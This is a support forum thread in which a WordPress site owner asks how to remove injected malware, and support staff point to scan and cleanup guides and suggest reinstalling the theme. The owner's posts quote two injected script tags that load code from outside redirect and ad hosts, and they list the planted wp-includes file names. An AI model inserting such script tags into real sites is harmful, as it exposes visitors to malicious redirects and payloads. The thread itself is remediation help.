I found this malware script on my website:
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2466565"></script>
Sometimes when I click anywhere on my page a new tab opens and loads an ad after redirection;
This is the page of my website. It is spread all over my site. How do I fix this?
https://www.wentdiary.com/top-17-things-to-do-in-oklahoma-city/
I just ran Site Scan and it detected 3 files that include that java script:
Please check the results: https://sitecheck.sucuri.net/results/https/www.wentdiary.com/top-17-things-to-do-in-oklahoma-city/
This is the full code of malware script that I found:
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2466565"></script>
<script src="//joophesh.com/ntfc.php?p=2497056&tco=1" data-cfasync="false" async></script>
Hi,
Please make sure that you have the last version of Newspaper theme and WordPress.
How to Scan WordPress Database for Malware ->https://www.fixrunner.com/how-to-scan-wordpress-for-malware/
How to Clean a WordPress Hack -> https://sucuri.net/guides/how-to-clean-hacked-wordpress
You can check a similar topic ->https://forum.tagdiv.com/topic/my-newspaper-hacked-please-help/
Thank you!
I replaced the existing functions.php file with the fresh one from theme files and suddenly my whole website has stopped working. https://www.wentdiary.com
I did this to remove injected malware from my website. I also removed these malware files from wp-includes includes/wp-vcd.php, wp-includes/class.wp.php, wp-includes/wp-feed.php, wp-includes/wp-tmp.php
Did i have to overwrite functions.php file to get rid of the malware completely? I can’t access a single page or post of my website after overwriting functions.php not even the login page. What do I do?
Hi,
You can connect via FTP and delete the current theme and drop the new one ( like an update via FTP ), deleting the current theme will remove the malware ( and you’ll not loss any settings from theme panel, but settings made in theme files will be remove ).
How to Update the Newspaper Theme for WordPress
-> https://tagdiv.com/update-newspaper-theme/
Thank you!